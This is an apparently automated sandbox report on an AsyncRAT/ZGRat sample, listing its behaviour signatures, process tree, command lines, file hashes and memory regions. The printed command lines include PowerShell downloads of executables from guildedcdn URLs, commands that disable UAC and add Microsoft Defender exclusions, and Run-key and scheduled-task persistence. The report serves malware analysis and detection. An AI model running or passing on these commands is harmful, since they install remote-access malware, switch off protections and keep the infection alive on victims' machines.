Malware Analysis Report

2025-08-10 19:35

Sample ID 231115-mstg4ahb3z
Target resources.exe
SHA256 f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a
Tags
asyncrat zgrat operacert windefault evasion persistence rat trojan
score
10/10

Analysis Overview

score
10/10

SHA256

f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

Threat Level: Known bad

The file resources.exe was found to be: Known bad.

Malicious Activity Summary

ZGRat

Detect ZGRat V1

UAC bypass

AsyncRat

Async RAT payload

Downloads MZ/PE file

Blocklisted process makes network request

Drops startup file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Creates scheduled task(s)

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-15 10:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-15 10:44

Reported

2023-11-15 10:46

Platform

win10v2004-20231023-en

Max time kernel

154s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunNihaiersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\RunihaiVersion.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Public\Music\israil2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OperaCert = "C:\\Users\\Admin\\AppData\\Roaming\\OperaCert\\OperaCert.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinDefatullt = "C:\\Users\\Admin\\AppData\\Roaming\\WinDefatullt\\WinDefatullt.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\2WinDefault.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\resources.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\VisualStudioo.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2784 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 528 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2332 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 528 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4632 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 528 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4632 wrote to memory of 2224 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 4964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4964 wrote to memory of 4596 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2224 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 448 wrote to memory of 940 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 940 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunihaiVersion.exe
PID 4892 wrote to memory of 4784 N/A C:\Users\Public\Music\RunihaiVersion.exe C:\Windows\SysWOW64\cmd.exe
PID 4784 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2828 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1380 -ip 1380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 804

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x5nqzt2r.rli.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/2168-33-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2168-35-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/2168-34-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/2168-41-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b07e68c027ea6a742f8eb70028f3c4b3
SHA1 cd1d60ba3396b14413de92e65618c88703d5fc73
SHA256 8452dfd10db3b1fba17015a6dba7948b5a76782beb84119602b097637e5ff912
SHA512 1daa6b0564dc7866f88a1cd30ccfe4ec4d8552cb2e6505ab5241a323603c7b8ffd5bf06abb768d1fb3a3b1e36d162307aa6847a60f3be55d7e29768f936d9d90

memory/2168-47-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/2168-50-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4436-52-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

memory/4436-51-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4436-53-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c7541283c2b98573c8e4af77affd1d
SHA1 00bd6af4931f06c8509039a9030ae0bf778d06f5
SHA256 1bfc7cbefee83d45b424892998667d018bc6545541ac1003621b0e9e248c8f25
SHA512 d85df02776475e85e99428d45c929836f38a73485481d3ee2c872266b4a9a9ad395084976addd5c0336a09052e41e0f72c1bec0355e1b0965766930bb0d81f2e

memory/4436-64-0x0000000004EA0000-0x0000000004EB0000-memory.dmp

memory/4436-67-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2332-68-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2332-69-0x0000000005580000-0x0000000005590000-memory.dmp

memory/2332-70-0x0000000005580000-0x0000000005590000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d78da0b1a407d02064e1a683e6a91515
SHA1 46ce5b401087047c413ba6716231fae761c59d41
SHA256 dced05a96fc74f496c32f77c41afab079926c92b633ab623dbb4092c108c2233
SHA512 6ae7197ccaf96286042e463865e445daa85bf6a7f0a02456bf17b7ae5290e99261d2247e934d4b5ce6fd87aa1680626f493852157799727bf46812853cea32ba

memory/2332-81-0x0000000005580000-0x0000000005590000-memory.dmp

memory/2332-84-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2512-85-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/2512-86-0x0000000004F60000-0x0000000004F70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5119dccd6c6683851dd33e6a09ca8e27
SHA1 eeb5f3e46522462149c7ed93d288e62a6fd8790a
SHA256 d6734c288d5a479bc91823c941cec3b46fcf113d303c50cb3aef6830bdcbb626
SHA512 cfeb51e802ba495cebf7d6888aeb9cdccde755bc10feb610ab629d658943a8f2c2f1f0aa97a7dc8e4ea3a3ca37b6444c3bcbb72331f652138bf40af5aeeb828e

memory/2512-97-0x0000000004F60000-0x0000000004F70000-memory.dmp

memory/2512-100-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/3532-101-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/3532-102-0x0000000002760000-0x0000000002770000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8dff0ea200abe0db68b89cd9ee373a86
SHA1 543c8df3221e9f1b872e3dfcffc24f2d14a7ac0a
SHA256 b7d40a4455dffbd410178887871eae4f9a8c11d50aeccdcf082836a529e04c7f
SHA512 621bee5e7950b4ae9a20ae6d2f3dced3b9c21d8835bce6feb8854a8a5e3e54571a2a9c8c894a06982f46ab572b78aa658ce6a8aad81ae257b7d814c088709c75

memory/3532-113-0x0000000002760000-0x0000000002770000-memory.dmp

memory/3532-116-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/1952-117-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/1952-118-0x0000000005300000-0x0000000005310000-memory.dmp

memory/1952-119-0x0000000005300000-0x0000000005310000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8fe6f08f93bce59a32e1dd53220ed93
SHA1 46ef4de2bde6a43f1526f87b3a2136f59fe386b0
SHA256 43712035089e489ecf1ccfd1b20c259d97791cc37cf0aac9a966e107cc039f89
SHA512 fc0a366751b96a849fc533069bd3844cbbfe2156a933b527c5793f169527b1fb5d5a4ef48dea6969f3695e6eab7bc046b1d6f89492482bd99e97c9f42893308c

memory/1952-130-0x0000000005300000-0x0000000005310000-memory.dmp

memory/1952-133-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

C:\Users\Public\Music\RunNihaiersion.exe

MD5 123bdf05b4b261644ff4579b8bd78806
SHA1 d6ce6069ba2faed71c5626daf8094a7ac921848b
SHA256 9736150b75ca7c0c89b7e0530a98c640b3ee8863b0b39a56a1d8ff9b114de631
SHA512 e734bd6455e83144ee78d9fe393fb85f968e960a5908a22bd1d884478ca79c5cbef6d0ea010d6dd575920e6931ad0be8ea02af5da46668b7287f00e75afd93b5

memory/4632-137-0x0000000000E20000-0x0000000000E28000-memory.dmp

memory/4632-138-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\bes.bat

MD5 9947ba16f06abcff429e922c49790337
SHA1 bd24d00f50e0d63892fc641a1438551d577b6e50
SHA256 8683fbcb2068bf7759e1b221e2dc660757e96e2a23ac9404a541ba82fb9c4a4f
SHA512 2a8ace440d7ab8a3ae6f02a84b5f7c81872d09946752ec02ac1a0fc64d9e1cfcb891c935f11394e395c748fb5b0f8a320f71dac25fa0c19a8a87e688af49cd11

memory/4632-141-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

C:\Users\Public\Music\israil.exe

MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

memory/448-145-0x0000000000370000-0x0000000000378000-memory.dmp

memory/448-146-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\installer2.bat

MD5 50b98ed3895545b2b72b28966cfa2b0d
SHA1 bf98a58225c8ce199e48825624e793ee8e0ca3f8
SHA256 ac019bd8d7937f836b6039c3d0a33c8e75509fb0ab79ee41ec3171f0cb0e1591
SHA512 af1c1bb692280e89df2a92f6aedbb90d76e3017572723f1bcacd092ecfd07cb1b05ebb9eb4dc322628d0734f96c95cae0e360042162859e55af957009bf0acaa

memory/448-149-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4000-150-0x0000000074D30000-0x00000000754E0000-memory.dmp

memory/4000-151-0x0000000004990000-0x00000000049A0000-memory.dmp

memory/4000-157-0x0000000005750000-0x0000000005AA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3d6d729eff6649ceccec1c3c472baef
SHA1 49fbaf7d60bd9a4d496d2804a38bc843bfe9428f
SHA256 5ab2d2d9eb1247a292eb387efbfc40e8afe47322eedaa2f8a68b807c604abd50
SHA512 4a803658111a264a065e226278fcedfd64b8c17ad25c9a85d00440a35d432ff2c3f13e009fe6e3843f68672237e597b87900f151617b39aa1cb9e2dc3d5dd0bc

memory/4000-163-0x0000000004990000-0x00000000049A0000-memory.dmp

memory/4000-164-0x0000000006370000-0x00000000063A2000-memory.dmp

memory/4000-165-0x00000000703C0000-0x000000007040C000-memory.dmp

memory/4000-175-0x0000000006340000-0x000000000635E000-memory.dmp

memory/4000-176-0x0000000006E30000-0x0000000006ED3000-memory.dmp

memory/4000-177-0x0000000007170000-0x000000000717A000-memory.dmp

